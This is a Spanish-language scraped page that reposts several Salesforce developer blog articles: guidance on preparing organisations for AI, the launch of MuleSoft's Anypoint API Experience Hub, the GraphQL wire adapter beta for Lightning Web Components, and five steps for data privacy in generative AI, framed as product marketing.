admin administrador Administradores AMA Anuncios Arquitecto Arquitectos Automatización Blogs CI cli CLI de Salesforce CLI de SF Cloud Cómo Comunidad cuenta desarrollador Desarrolladores desarrolladores de Salesforce Desarrollo desarrollo de aplicaciones Dev Developer Herramientas DevOps EGA Futura Empresa Force.com ga Generalmente disponible Genie github Herramientas html Instrucciones integración integración continua Investigación la oportunidad Noticias Novedades Nube Nuevos desarrollos Ohana Oportunidad Plataforma Plataforma de Salesforce Podcast Product Producto productos Quip Salesforce Salesforce CLI Salesforce.com seguridad SEPA SF CLI SFDX Slack Tech Tema TI twitter UI UX Versión

Navegue por su camino hacia un futuro de IA

Bienvenido a la era digital, donde la inteligencia artificial reina y las organizaciones se encuentran en la cúspide de una revolución. El futuro de la IA está aquí y está impulsando un increíble impulso empresarial. Los líderes y las personas se esfuerzan por comprender los riesgos y las oportunidades de implementar la IA. Mientras que, al mismo tiempo, están tratando de no quedarse atrás de la competencia.

Para prepararse para un futuro de IA, las empresas deben adoptar un enfoque estratégico y holístico que aborde varios factores clave. Profundicemos en los pasos esenciales para convertir su organización en una potencia impulsada por IA.

Comience con AI Cloud

Los servicios profesionales de Salesforce pueden ayudarlo a establecer la base adecuada para el éxito con nuestro nuevo paquete, AI Coach.

Cultivar la seguridad para conducir a los empleados

Introducir IA en una organización requiere crear un entorno seguro y de apoyo. Anime a sus equipos a aceptar el cambio y tomar riesgos. Generar confianza dentro de la organización permite que las personas se sientan seguras en sus funciones y las motiva a explorar el potencial de la IA.

Para crear un entorno seguro y de apoyo para la adopción de IA:

Fomentar una cultura de transparencia : Promover una comunicación abierta y honesta sobre las iniciativas de IA, abordando inquietudes y brindando explicaciones claras.
Fomente la innovación y la experimentación : cree oportunidades para que los empleados exploren las tecnologías de IA y experimenten con nuevas ideas. Involucre a sus equipos y empoderarlos para compartir sus perspectivas únicas en su viaje de IA.
Proporcione oportunidades de aprendizaje y desarrollo : demuestre el apoyo de la organización ofreciendo programas de capacitación, talleres y recursos. Sus equipos se sentirán alentados a adquirir nuevas habilidades y mejorar su comprensión de la IA.
Reconozca y recompense las contribuciones : reconozca y celebre a los empleados que participan en iniciativas de IA. Esto fomenta un sentido de valor y motiva a las personas a participar en la transformación de la IA.

Al cultivar una actitud positiva hacia el cambio, las organizaciones pueden prepararse para las oportunidades de un futuro de IA.

Mejorar la adopción priorizando el impacto humano

Para adoptar con éxito la IA, es importante comunicar una visión convincente centrada en el ser humano . Si bien la IA puede parecer impersonal, debemos enfatizar el impacto beneficioso que puede tener, especialmente considerando las bajas barreras de entrada que la hacen accesible a una amplia gama de usuarios.

Una de las ventajas clave de la tecnología de IA es su baja barrera de entrada. Considere el ejemplo de TikTok, una plataforma social que alcanzó los 100 millones de usuarios en solo nueve meses . En comparación, el motor de IA generativa, ChatGPT, logró el mismo hito en solo dos meses. Esto muestra la facilidad con la que se puede adoptar la tecnología de IA y el rápido ritmo al que se puede adoptar a escala mundial.

Para lograr una adopción exitosa de la IA:

Comunique los beneficios de la IA centrados en el ser humano : enfatice cómo la IA puede mejorar la productividad y automatizar tareas tediosas. Presente la IA como un activo valioso que aumenta, no reemplaza, el trabajo humano y como un cambio que puede acelerar el trabajo y mejorar la satisfacción laboral.
Encuentre y comunique beneficios específicos : Ilustre las ventajas de ahorro de tiempo de la adopción de IA. Colóquelo como un asistente personal que agiliza los flujos de trabajo y libera tiempo para un trabajo más significativo.
Presente un caso sólido para el cambio : comunique las consecuencias de no adoptar la IA. Reflexione sobre las mejores prácticas de la industria, destacando el ritmo sin precedentes de adopción de IA y las bajas barreras de entrada.

Al centrarse en los beneficios centrados en el ser humano y resaltar las barreras de entrada bajas, las organizaciones pueden integrar rápidamente soluciones de IA en sus flujos de trabajo sin necesidad de una amplia experiencia técnica o una inversión financiera significativa. Esta accesibilidad permite un proceso de adopción más inclusivo y abre las puertas a una variedad de industrias y sectores.

Empodere a su organización para un futuro de IA

Dotar a su organización de las herramientas y estrategias adecuadas es crucial para mantenerse competitivo e impulsar el éxito. Considere desarrollar un programa de capacitación integral y un proceso formal de adopción de IA. Con prácticas como estas, sus equipos pueden mantenerse ágiles con la tecnología en evolución.

Estos tres pasos cruciales han demostrado ser esenciales para el éxito de las transformaciones digitales:

Defina iniciativas de capacitación : haga que la capacitación en IA sea una parte obligatoria de la habilitación de los empleados. Salesforce, por ejemplo, reconoció la importancia de equipar a sus empleados con un enfoque seguro y reflexivo para usar la IA. Este paso fue esencial durante su cambio para convertirse en el CRM de IA n.º 1 del mundo.
Cree procesos formales para aumentar las tasas de adopción de la IA : no espere a que los miembros del equipo exploren la IA en su tiempo libre. Establezca procesos estructurados para integrar la innovación de IA en el trabajo de todos. Considere formar comités dedicados para impulsar los avances de la IA o medir la cantidad de ideas de IA enviadas por los ingenieros. Independientemente de la estructura que elija, formalizar el proceso de adopción es clave.
Sea flexible con la tecnología de IA en evolución : manténgase actualizado con los últimos avances en IA. En un panorama que cambia rápidamente, las empresas deben prepararse para adaptar y cambiar sus iniciativas. Adopte la flexibilidad y la agilidad cuando trabaje con tecnologías de IA.

Al adoptar las mejores prácticas de transformación digital e incorporar la IA en los procesos formales, las organizaciones allanan el camino para el éxito continuo en el futuro de la IA.

Impulse la transformación continua con la Oficina de Innovación Continua

Los servicios profesionales de Salesforce pueden ayudarlo a elevar sus capacidades para obtener el máximo valor de su inversión en Salesforce.

Proteja su IA

Si bien la IA presenta inmensas oportunidades, una preocupación crucial es el uso ético de la IA. Es imperativo salvaguardar los datos confidenciales de los clientes de su empresa con una plataforma de IA confiable , como AI Cloud de Salesforce , construida sobre la capa de confianza GPT de Einstein . Las plataformas de IA confiables implementan medidas sólidas de protección de datos, que incluyen encriptación, controles de acceso y cumplimiento de las normas de privacidad de datos.

Para salvaguardar sus datos confidenciales y mantener la confianza de sus clientes:

Establecer un marco de gobernanza ético : Promover la transparencia, la equidad y la responsabilidad en los algoritmos de IA y los procesos de toma de decisiones. Esto garantiza que la implementación responsable esté alineada con los valores de su negocio.
Priorice la privacidad y la seguridad de los datos : aplique medidas estrictas para proteger la información confidencial. Cumpla con las regulaciones y siga las mejores prácticas de la industria. Dado que la IA depende en gran medida de los datos, proteger esos datos fomenta la confianza entre los clientes, socios y partes interesadas.
Proporcione programas regulares de capacitación y actualización : asegúrese de que su capacitación de habilitación cubra los aspectos técnicos de la IA, así como la comprensión de sus limitaciones y riesgos. Con este conocimiento, los empleados pueden tomar decisiones informadas y tomar las medidas adecuadas mientras usan la IA.

Al implementar la IA de manera responsable y comprender las necesidades y los obstáculos para adoptar la IA, las organizaciones pueden convertirse en líderes confiables en la era de la inteligencia artificial.

Encienda su viaje de transformación de IA

Revolucione la productividad, la eficiencia y las experiencias de los clientes de su organización para un futuro de IA. Al crear seguridad, proporcionar una razón para el cambio centrada en el ser humano, empoderar a sus equipos y salvaguardar la IA, las organizaciones pueden experimentar una profunda transformación en empresas impulsadas por la IA.

Salesforce Professional Services ofrece una oportunidad única para las organizaciones que buscan embarcarse en su viaje de IA. Adopte AI Coach y haga uso de la experiencia de los servicios profesionales de Salesforce para maximizar el potencial de la IA. Trabajamos con usted para escalar y personalizar las experiencias de los clientes al alinearnos con los resultados comerciales, construir un camino hacia el valor comercial, prepararnos para la entrega inmediata y establecer una hoja de ruta de estado futuro que esté alineada con su visión y objetivos.

Juntos, podemos impulsar su viaje y posicionar su negocio a la vanguardia de la innovación impulsada por IA, brindando experiencias excepcionales y generando confianza en esta era digital.

Seguir leyendo

accesibilidad Agile ai AMA Business chat CI cli Cloud Cómo Conocimiento CRM Data Datos Desarrollo EGA Futura Einstein Einstein GPT Empresa Empresas Estrategia flujo Flujos Force.com Funciones ga Genie Herramientas IA generativa INCLUYE inteligencia inteligencia artificial Lead LEx Mejorar la productividad Negocio Oportunidad PCI Plataforma privacidad de datos Proceso Product Productividad Quip Salesforce Salesforce.com seguridad Tarea Tecnología TI transformación digital UI Versión

Aumente el compromiso de la API con Anypoint API Experience Hub ☁️

El enlace a la publicación original, lo encontrarás al final de este artículo.

…

Aumente el compromiso de la API con Anypoint API Experience Hub | Blog de desarrolladores de Salesforce

¿Alguna vez trabajó en un proyecto el 90% del camino, solo para descubrir que alguien más ya lo había hecho? El uso de API es una forma común de integrar varios sistemas y crear aplicaciones modernas. Las API son bloques de construcción componibles que ayudan a brindar servicios digitales más rápido. Pero, la realidad es que las API creadas dentro de una organización a menudo carecen de visibilidad y documentación relevante para promover su reutilización por parte de otros equipos. ¿Qué sucede si puede tener una única fuente de verdad que le permita encontrar, ver e interactuar con las API?

Nos complace anunciar el lanzamiento de Anypoint API Experience Hub , la solución de portal de API personalizable de MuleSoft que ayuda a las organizaciones a administrar mejor su cartera de API y maximizar sus inversiones en API. En esta publicación de blog, profundizaremos en las funciones y los beneficios de la nueva solución para desarrolladores y organizaciones.

¿Qué es un portal API?

Un portal de API es una interfaz integral que ayuda a los proveedores de API a exponer y publicitar sus API, educar a las comunidades de desarrolladores sobre ellas, compartir documentación y proporcionar acceso de autoservicio a los consumidores de API . Algunos portales de API tienen capacidades adicionales, como un servicio de simulación, que permite a los desarrolladores probar una API, ver respuestas de ejemplo y analizar si la API cumple con sus requisitos, lo que ahorra tiempo general al desarrollador. Los portales de API se pueden crear tanto para desarrolladores internos como externos, lo que brinda oportunidades para aumentar el valor comercial de sus API.

En el backend, un buen portal de API también requiere administración de usuarios y API, seguridad integrada y la capacidad de realizar cambios rápidamente en el portal cuando sea necesario. Con todos estos factores en mente, MuleSoft ha creado una solución que permite a las organizaciones crear portales de API de marca que aumentan la visibilidad de la API y la participación de los desarrolladores.

Centro de experiencia de la API Anypoint

Hoy, MuleSoft lanzó Anypoint API Experience Hub , una nueva solución que permite a las organizaciones crear portales para desarrolladores para sus productos API. Con API Experience Hub, los gerentes de productos de API pueden crear portales de desarrolladores personalizados en cuestión de minutos utilizando una plantilla lista para usar que los ayuda a producir, publicar e interactuar con las API creadas en cualquier tecnología o plataforma.

API Experience Hub está impulsado por Salesforce Experience Cloud y es parte de la solución Universal API Management de MuleSoft , que permite a las organizaciones descubrir, controlar, publicar e interactuar con cualquier API creada en cualquier puerta de enlace o entorno.

Como desarrollador, podrá aprovechar los siguientes beneficios con Anypoint API Experience Hub :

Cree portales de API en cuestión de minutos
Descubra y reutilice las API fácilmente
Ahorre tiempo en la documentación
Colaborar con otros desarrolladores

Echemos un vistazo a cada beneficio en detalle.

Cree portales de API en cuestión de minutos

Con API Experience Hub, no necesita experiencia en desarrollo web para crear un portal de API, lo que le ahorra semanas de creación y resolución de problemas de un sitio web desde cero. Se le guiará a lo largo del proceso sin necesidad de alternar entre la documentación y las páginas de configuración del portal. Puede personalizar la marca y los colores de su organización con clics, lo que le permite crear su portal API en cuestión de minutos.

¿Quiere hacer cambios en la plantilla base? Puede personalizar aún más a través de Salesforce Experience Builder y arrastrar y soltar varios componentes. Aprovechando las capacidades de Experience Cloud, incluso puede desarrollar y agregar componentes web de iluminación personalizados para mejorar aún más la experiencia del usuario.

Descubra y reutilice las API fácilmente

Dado que API Experience Hub es parte de Anypoint Platform, cualquier API dentro de su organización que esté catalogada en Anypoint Exchange puede estar disponible en su portal de API. Anypoint Exchange es un mercado interno para su organización donde puede compartir especificaciones de API, fragmentos, conectores, plantillas de integración y más. Sin embargo, con API Experience Hub, los desarrolladores pueden seleccionar y compartir las API más consumibles para consumo interno y externo. Además, Experience Hub viene con capacidades de búsqueda integradas que le permitirán encontrar API específicas rápida y fácilmente para su reutilización.

También hay una página de detalles de API incorporada que le brinda información sobre cada API y le permite descargar o solicitar acceso a las API.

Ahorre tiempo en la documentación

Entonces, quizás se pregunte, ¿cómo funciona la documentación? Cuando su especificación de API esté lista para compartirse en el portal de API, ¡no necesitará documentar todo desde cero! Con capacidades de documentación autogenerativa, Experience Hub completa la documentación y los ejemplos según la especificación de su API. Esto te beneficia de dos maneras enormes:

Ahorre tiempo al crear la documentación de especificación de su API. Por supuesto, puede agregar documentación personalizada o agregar más contexto, pero Experience Hub hará la mayor parte del trabajo por usted.
Cuando busque API para incorporar a su proyecto, puede ir al portal de API sabiendo que hay documentación y ejemplos disponibles.

Por último, Experience Hub viene con una función Pruébelo que le permite realizar llamadas simuladas a una API para averiguar cómo sería una respuesta de ejemplo.

Colaborar con otros desarrolladores

Como se mencionó anteriormente, Anypoint API Experience Hub se basa en Salesforce Experience Cloud , un sistema de publicación web de clase empresarial. Esto significa que cuando crea un portal de API a través de Experience Hub, puede aprovechar numerosas capacidades listas para usar para comunidades, foros y soporte. Para obtener más información sobre Experience Cloud, consulte esta ruta .

El portal de API personalizado ayuda a mejorar el compromiso con las API al permitir que los desarrolladores internos y externos colaboren de manera efectiva para mejorar una API, todo dentro de una única plataforma unificada sin silos de conocimiento.

Conclusión

Con Anypoint API Experience Hub, puede crear un portal de API rápidamente, descubrir y reutilizar API, ahorrar tiempo en la documentación y colaborar fácilmente con otros desarrolladores. Su organización puede poner en funcionamiento un portal API en cuestión de minutos a través de un proceso de configuración simple y una plantilla de portal.

Si desea obtener más información sobre Anypoint API Experience Hub, consulte nuestro video de presentación de productos .

Sumérjase aún más en Anypoint API Experience Hub viendo nuestro seminario web, Cree ecosistemas de API más rápido en la plataforma Anypoint de MuleSoft . En este seminario web, aprenderá cómo el nuevo Anypoint API Experience Hub, creado en Salesforce Experience Cloud, le permite crear rápidamente experiencias de API atractivas utilizando las API catalogadas en Anypoint Exchange.

Sobre el Autor

Sue Siao es directora técnica de marketing de productos en Salesforce. Es una creadora de contenido que da vida a los productos a través de demostraciones técnicas. Fuera del horario laboral, es mentora de jóvenes en el Área de la Bahía de San Francisco y practica boulder.

Obtenga las últimas publicaciones de blog de desarrolladores de Salesforce y episodios de podcast a través de Slack o RSS.

Agregar a Slack Suscríbete a RSS

Seguir leyendo

admin administración Administración de usuarios administrador AMA Anypoint Anypoint API Experience Hub API apis Aplicaciones Arquitecto Blogs Business CI cli Cloud cola Cómo Comunidad Comunidades Conocimiento desarrollador Desarrolladores desarrolladores de Salesforce Desarrollo Dev documentación EGA Futura Empresa Experience Cloud Force.com Funciones ga Gestión de usuarios html integración integración y API Marca Marketing MuleSoft MuleSoft Anypoint Platform Ohana Oportunidad Otros Plataforma Podcast Proceso Product Producto productos Quip Respuesta Respuestas Salesforce Salesforce.com seguridad Slack Soporte Tecnología Tema Temas TI UI Versiones

Explore el adaptador de cable GraphQL, ahora en versión beta ☁️

El enlace a la publicación original, lo encontrarás al final de este artículo.

…

Explore el adaptador de cable GraphQL, ahora en versión beta | Blog de desarrolladores de Salesforce

¡Atención, desarrolladores de Salesforce! Hemos estado incursionando en GraphQL durante algún tiempo y estamos llevando las cosas al siguiente nivel. Hace unos meses, anunciamos el lanzamiento piloto del adaptador de cable GraphQL. Mantenga sus soportes porque estamos implementando la versión beta del adaptador de cable GraphQL de Salesforce en nuestro lanzamiento de verano '23. En este blog, exploraremos las novedades de la versión Beta y cómo utilizar Recetas de LWC para crear fácilmente su aplicación Salesforce con la tecnología de GraphQL.

La versión Beta del GraphQL Wire Adapter es un avance significativo en la gestión de datos de Salesforce en LWC. Con la introducción de nuevas funciones, como Recetas LWC, Actualización de datos e Integridad referencial, el proceso de desarrollo se ha vuelto más ágil y eficiente.

El adaptador de cable GraphQL permite consultar datos de Salesforce mediante consultas expresivas con funcionalidades como filtrado, clasificación, paginación y seguimiento de relaciones padre/hijo. También incluye una capa de gestión de datos y almacenamiento en caché del lado del cliente de Lightning Data Service. Estas funciones mejoran la eficiencia y la velocidad del acceso a los datos de Salesforce desde sus aplicaciones web y móviles de LWC.

El adaptador de cable GraphQL interactúa con la API de Salesforce GraphQL, que expone todos los objetos estándar y personalizados disponibles a través de la API de la interfaz de usuario, junto con los metadatos de los objetos. La API también mantiene la seguridad a nivel de objeto y de campo del usuario actual durante la ejecución de la consulta.

Para familiarizarse con el esquema de la API de GraphQL, sugerimos revisar la documentación del esquema utilizando el cliente de Altair GraphQL . Las herramientas disponibles en este cliente facilitan la redacción de su consulta GraphQL y su validación. Luego puede copiar y pegar su consulta directamente en su código JavaScript en Visual Studio Code.

Novedades en Beta:

Recetas LWC: estos son componentes listos para usar que muestran varios casos de uso de GraphQL
Actualización de datos: un mecanismo para actualizar los datos devueltos por su consulta de GraphQL
Integridad referencial: este mecanismo garantiza la coherencia de los datos y las referencias a los recursos de Salesforce, como entidades y campos, son sólidas.

Analicemos cada una de estas características en detalle.

Recetas LWC

LWC Recipes es un repositorio de GitHub con una colección de ejemplos de código disponibles públicamente para componentes web Lightning. Incluye tres recetas GraphQL para ayudarlo a comenzar rápidamente a crear su aplicación Salesforce con GraphQL.

El repositorio proporciona instrucciones sobre cómo configurar su entorno, crear su organización de Salesforce, clonar el repositorio en su máquina local e implementar la aplicación en su organización. El código fuente se puede importar directamente a su Visual Studio Code como un proyecto que puede personalizar según sus necesidades.

Una vez que implemente la aplicación Recetas de LWC en su organización de Salesforce, es posible que vea los siguientes componentes mediante consultas de GraphQL.

Aquí hay una descripción general de los cuatro componentes de LWC que usan consultas GraphQL:

graphqlContacts : obtiene contactos que cumplen ciertos criterios, ordenados por nombre y limitados a los primeros cinco registros
graphqlVariables : captura la entrada del usuario en una barra de búsqueda en una variable y compone una consulta para devolver contactos cuyo nombre coincide parcialmente con la cadena de entrada
graphqlRefresh : obtiene una cantidad de empleados en una cuenta y actualiza los datos al hacer clic en el usuario
graphqlPagination : Habilita la paginación a través de una lista de contactos

Dado que muchos de nuestros clientes preguntan sobre la paginación, profundicemos un poco más. El adaptador de cable GraphQL es compatible con la paginación basada en cursores de GraphQL. Puede recorrer las páginas de los resultados de su consulta y controlar la cantidad de resultados que desea obtener cada vez. Para especificar el número de registros a devolver, utilice el first argumento. El número predeterminado es 10.

Si hasNextPage es verdadero, puede proporcionar el valor de endCursor al argumento after de una consulta posterior para solicitar la siguiente página de resultados.

Aquí hay una captura de pantalla de cómo podría verse el proyecto Recetas de LWC en Visual Studio Code. Puede ver un código de ejemplo para la implementación de la paginación.

Actualización de datos

En el mundo del desarrollo de aplicaciones, mostrar datos actualizados es fundamental para una buena experiencia de usuario y para generar confianza. Por lo tanto, en la versión Beta del GraphQL Wire Adapter, presentamos la función refreshGraphQL .

Esta función permite a los desarrolladores activar manualmente una repetición de la consulta. ¿El resultado? Una actualización de los datos proporcionados por el adaptador de cable GraphQL, lo que garantiza que los usuarios siempre vean los datos más actualizados.

Esta actualización se puede activar a pedido, como un clic de botón de un usuario o un evento de JavaScript específico. Esto significa que puede optimizar su aplicación para que se actualice solo cuando sea necesario, lo que proporciona una manera eficiente de mantener los datos actualizados y maximizar el rendimiento de la aplicación. En pocas palabras, la función refreshGraphQL ofrece un método amigable con el rendimiento para mantener los datos actualizados, mejorando la experiencia del usuario y aumentando la confiabilidad de la aplicación.

Aquí hay un ejemplo de uso:

Consulte el componente graphqlRefresh en las recetas de LWC para ver otro ejemplo del uso de la función de actualización de datos.

Integridad referencial

La versión Beta del adaptador de cable GraphQL presenta integridad referencial. He aquí una breve descripción de sus beneficios e implicaciones.

Lightning Data Service (LDS), la capa de administración de datos del lado del cliente de Salesforce, mejora la eficiencia de la aplicación al permitir que los componentes compartan datos, reducir las llamadas al servidor y mantener la coherencia de los datos. También garantiza referencias sólidas a los recursos de Salesforce, propagando cambios de nombre y evitando eliminaciones cuando las referencias persisten.

En la versión piloto del adaptador, requerimos el uso de directivas @category para ayudar a LDS a comprender el esquema de datos y normalizar sus datos de GraphQL.

Sin embargo, en la versión Beta, estas directivas ya no se requieren manualmente. Si se usaron anteriormente, ahora se pueden eliminar de sus consultas de GraphQL. El compilador gestiona de forma autónoma estas directivas, agilizando su proceso de código y reduciendo posibles errores manuales.

¿Qué sigue para GraphQL?

Recordatorio: Salesforce es una empresa que cotiza en bolsa y los clientes deben basar sus decisiones de compra en los productos y servicios que están disponibles actualmente.

Estamos comprometidos a continuar invirtiendo en GraphQL. Esto es lo que puede esperar en los próximos lanzamientos (se aplica la declaración prospectiva):

Invierno '24:

Adaptador de cable GraphQL (GA)
Compatibilidad con mutaciones en la API de GraphQL
Compatibilidad con consultas agregadas en GraphQL Adapter
Capacidad de consulta de tareas y eventos en GraphQL API (Beta)

Primavera 24 y más allá:

Compatibilidad con mutaciones en GraphQL Adapter
Funciones avanzadas de paginación
Soporte de campos opcionales

Recursos para desarrolladores

Sobre el Autor

Suvda Myagmar es directora de gestión de productos en Salesforce y le apasionan las plataformas de datos e IA. Le encantan las carreras largas mientras escucha audiolibros.

Obtenga las últimas publicaciones de blog de desarrolladores de Salesforce y episodios de podcast a través de Slack o RSS.

Agregar a Slack Suscríbete a RSS

Seguir leyendo

admin administración administrador ai AMA API API de GraphQL Aplicaciones Arquitecto beta Blogs Carrera carreras CI cli Cómo Componentes Web Lightning Comunidad consulta contacto Contactos cuenta Data Datos desarrollador Desarrolladores desarrolladores de Salesforce Desarrollo desarrollo de aplicaciones Dev documentación EGA Futura Empresa Evento Eventos Force.com Funciones ga github GraphQL GraphQL API Herramientas html INCLUYE Instrucciones integración y API interfaz de usuario java javascript Lead Lightning Lightning Web Components lwc Mobile Móvil Objeto Ohana Pantalla PCI Pedido Pilot Piloto Plataforma Podcast Proceso Product Producto productos Recordatorio Registro Rendimiento Salesforce Salesforce.com seguridad Slack Soporte Tarea Tecnología TI UI Versión versión beta Visual Studio Code

5 pasos para la IA generativa confiable para desarrolladores de Salesforce ☁️

El enlace a la publicación original, lo encontrarás al final de este artículo.

…

5 pasos para la IA generativa confiable para desarrolladores de Salesforce | Blog de desarrolladores de Salesforce

La IA generativa se ha convertido en el factor de cambio para las empresas innovadoras y orientadas al cliente. Impulsada por algoritmos avanzados y aprendizaje automático, la IA generativa puede impulsar la innovación, optimizar los procesos y acelerar las empresas en todas partes al proporcionar experiencias y soluciones personalizadas adaptadas a las necesidades únicas de los clientes.

Igualmente importante para las experiencias poderosas dirigidas por el cliente es la protección de los datos críticos para el negocio. Los sistemas de IA procesan y generan contenido basado en grandes conjuntos de datos y, lamentablemente, los modelos de lenguaje extenso (LLM) no están poniendo su negocio en primer lugar. Mientras se prepara para implementar capacidades de IA generativa, es fundamental priorizar la privacidad de los datos. Al implementar medidas sólidas de protección de datos, no solo mantiene el cumplimiento de las regulaciones pertinentes, sino que también mantiene la confianza del cliente, su activo más valioso.

Con los cinco pasos que se describen a continuación, puede innovar rápidamente, aumentar la productividad y mejorar las experiencias personalizadas, al mismo tiempo que garantiza la seguridad y la privacidad de los datos de sus clientes.

Paso 1: comprender y auditar sus datos

Para asegurarse de tener las protecciones de seguridad, privacidad y gobernanza correctas, querrá comprender qué datos usará para crear avisos, plantillas y modelos de capacitación. Comprender los datos a los que permite que accedan los modelos de IA ayudará a evitar que se compartan inadvertidamente los datos personales o confidenciales de los clientes.

Entonces, ¿cómo empezar? Primero, anonimice y agregue los datos de los clientes antes de usarlos con fines de IA generativa. Elimine la información de identificación personal (PII) y cualquier otro dato confidencial que pueda identificar a las personas.

Una manera fácil de hacer esto en Salesforce es usar Data Detect , un producto que le permite revisar objetos y campos antes de permitir que los procesos de IA accedan a ellos para recibir indicaciones y capacitación. Una vez que los datos se han escaneado a través de Data Detect, puede confirmar que no hay sorpresas en esos datos, como números de tarjetas de crédito o direcciones de correo electrónico en campos donde ese tipo de datos no debería existir.

Data Detect también puede ayudar a recomendar un nivel de clasificación, como "Confidencial" o "PII" para datos personales, y proporcionar detalles sobre el contenido de un objeto, así como encontrar datos confidenciales generados por chatbots, casos y transcripciones de llamadas registradas automáticamente. por IA.

Paso 2: configure la protección de la privacidad de los datos para sus procesos generativos de IA

Respetar la privacidad del cliente y proteger los datos a lo largo de sus procesos de IA es crucial para establecer y mantener la confianza. A medida que confía más en la IA para comprender y tomar decisiones a partir de sus datos, ¿cómo protege también esos datos, especialmente la PII?

Para los procesos de IA que usan datos personales, como aumentar los registros de contacto u orquestar ofertas de marketing dinámicas 1:1, querrá desarrollar políticas de uso de datos claras y transparentes que describan cómo se manejarán los datos de los clientes, incluido su uso en sistemas de IA generativos. . Comunique estas políticas a sus clientes y bríndeles la oportunidad de optar por no participar o elegir el nivel adecuado de uso de datos. Además, cree una política para eliminar y ofuscar los datos que ya no son útiles o relevantes, para que sus clientes permanezcan protegidos y sus procesos de IA generativa permanezcan precisos.

Centro de privacidad puede ayudar a verificar que sus procesos de IA estén autorizados para su uso en capacitación y avisos. El Centro de privacidad también puede ayudarlo a crear políticas de retención para administrar el ciclo de vida de los datos utilizados y generados por la IA, incluidas las transcripciones de llamadas, los chatbots y los casos registrados automáticamente por la IA.

Paso 3: configure su organización para administrar la IA generativa

Tanto para proteger los datos utilizados en los procesos de IA como para confirmar que sus integraciones se mantienen dentro de los límites de los datos que desea utilizar, deberá implementar controles para proteger los datos de los clientes frente a accesos no autorizados o infracciones.

Los controles de acceso le permiten restringir el acceso a los datos del cliente solo al personal autorizado. Al otorgar acceso según sea necesario, reduce el riesgo de que los modelos de IA y las personas no autorizadas accedan a datos confidenciales. Esto protege contra el posible uso indebido de esos datos al tiempo que garantiza la privacidad del cliente.

Security Center puede ayudarlo a administrar de manera centralizada los permisos de usuario y las configuraciones de la organización para los datos que se usan y se obtienen de los procesos de IA.

Ahora preparémonos para implementar la IA de manera segura en toda su organización.

Paso 4: pruebe sus procesos para la implementación

Las pruebas en un entorno de espacio aislado son primordiales cuando se trata de IA generativa. Esto tiene dos propósitos fundamentales: probar los procesos de IA y capacitar a los empleados sobre el uso seguro y responsable de la IA generativa. Al realizar pruebas exhaustivas en un entorno de espacio aislado controlado, las organizaciones pueden evaluar y refinar el rendimiento y el comportamiento de sus modelos generativos de IA antes de implementarlos en escenarios del mundo real. Las pruebas permiten la identificación y mitigación de posibles problemas, como sesgos, errores o consecuencias no deseadas que pueden surgir durante un proceso de IA generativa.

Además, un entorno de sandbox proporciona un espacio seguro para que los empleados adquieran experiencia práctica y capacitación en el uso de herramientas y sistemas de IA generativa. Les permite explorar capacidades e identificar consideraciones éticas mientras toman decisiones informadas al usar la tecnología de manera responsable en sus operaciones diarias. Al aprovechar las pruebas de sandbox, las organizaciones pueden garantizar la confiabilidad, la eficacia y la aplicación ética de la IA generativa al tiempo que capacitan a su fuerza laboral para adoptar y utilizar esta tecnología transformadora con confianza.

Asegúrese de que, cuando utilice un espacio aislado para el entrenamiento de IA, haya eliminado todos los datos personales para crear sus indicaciones o entrenar un modelo de IA; puede eliminar u ofuscar fácilmente cualquier dato que no deba incluirse con Data Mask .

Paso 5: Supervise y proteja sus procesos de IA

Garantizar que la integración de IA no acceda a los datos ni modifique los sistemas más allá del alcance previsto es crucial para mantener la seguridad de los datos y la integridad del sistema. Como describimos anteriormente, los controles de acceso y los permisos de los usuarios deben definirse cuidadosamente, otorgando a los sistemas de IA solo los privilegios necesarios y limitando su acceso a fuentes o sistemas de datos específicos. Además, se deben realizar pruebas y validaciones exhaustivas de la integración de la IA para verificar que funcione según lo previsto y que no tenga consecuencias ni vulnerabilidades no deseadas.

Finalmente, implementar mecanismos de monitoreo robustos puede ayudar a detectar y alertar cualquier intento de acceso no autorizado o comportamiento anormal por parte del sistema de IA. Las auditorías y revisiones periódicas de los procesos de integración de IA y los registros de acceso pueden ayudar a identificar cualquier desviación o posibles riesgos de seguridad.

Event Monitoring ayuda a que el proceso de monitoreo y detección sea más fácil al permitir la configuración de capacidades, como la seguridad de transacciones, para enviar alertas o bloquear acciones más allá de lo que se pretendía inicialmente para su proceso de IA.

Finalmente, a medida que se adentra más en su viaje de IA, es fundamental que sus datos estén respaldados y puedan restaurarse hasta el nivel de registro en el caso poco probable de que los datos utilizados y aumentados por IA estén mal configurados o sincronizados incorrectamente. Haga una copia de seguridad de sus datos para ver cada versión de los registros utilizados y tocados por AI, y restaure cualquier error.

Conclusión

Al adoptar un enfoque que prioriza la privacidad e implementar medidas sólidas de protección de datos, puede crear una base confiable para prácticas de IA generativas responsables, sostenibles y éticas, todo mientras impulsa una innovación más eficiente y efectiva e interacciones más personalizadas con los clientes. Para obtener más información sobre cómo comenzar con la IA generativa, consulte nuestra Guía de introducción a la IA.

Recursos

Sobre el Autor

Marla Hay Vicepresidenta de Seguridad, Privacidad y Gestión de Datos en Salesforce y dirige la organización de productos de Servicios de confianza. Se unió a Salesforce en 2017 después de liderar productos en una empresa de gestión de identidad de consumidores. Marla tiene una licenciatura en Ciencias de la Computación de la Universidad de Cornell y una maestría en Ciencias de la Computación de la Universidad Johns Hopkins.

Obtenga las últimas publicaciones de blog de desarrolladores de Salesforce y episodios de podcast a través de Slack o RSS.

Agregar a Slack Suscríbete a RSS

Seguir leyendo

A PI admin administrador ai Alertas AMA Arquitecto artificial inteligencia Aura Avisos Blogs chat CI cli Cómo Comunidad contacto Correo electrónico Crédito CRO Data Datos desarrollador Desarrolladores desarrolladores de Salesforce Dev Developers EGA Futura Einstein GPT Empresa Empresas Force.com ga Herramientas html IA generativa Identidad INCLUIR integración Integraciones inteligencia artificial la oportunidad Lead Marketing Máscara de datos Monitoreo de eventos Negocio Objeto Ohana Oportunidad PCI Podcast Proceso Product Productividad Producto productos Prueba pruebas Registro Rendimiento Reseñas REST revisiones Salesforce Salesforce.com sandbox security seguridad Seguridad de datos Seguridad e identidad Slack Tecnología Tema Temas TI UI Versión

Uso de FileEvents para fortalecer la seguridad de los archivos ☁️

El enlace a la publicación original, lo encontrarás al final de este artículo.

…

Uso de FileEvents para fortalecer la seguridad de los archivos | Blog de desarrolladores de Salesforce

